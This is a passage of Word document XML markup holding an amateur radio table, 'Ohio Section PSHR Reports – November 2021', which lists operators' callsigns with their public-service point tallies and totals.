          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDD0F8F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAACEDF" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667E32E9" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078D7A52" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124119F6" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645C52EA" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C54AF20" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0109DDB0" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E78BDAB" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60351786" w14:textId="77777777" w:rsidR="00A93726" w:rsidRDefault="00A93726" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CF0678" w14:textId="39111A92" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OHIO SECTION PSHR REPORTS – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2638120C" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501911C7" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>WA3EZN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>335</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>465</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCBDAB4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>AD8CM</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>215</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>305</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63921C4E" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>W8DJG</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>115</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>245</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754D258" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>N2LC</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C167D65" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KD8UUB</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>70</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>158</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5563E" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>N8SY</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A7E75" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KM8V</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB24AF6" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
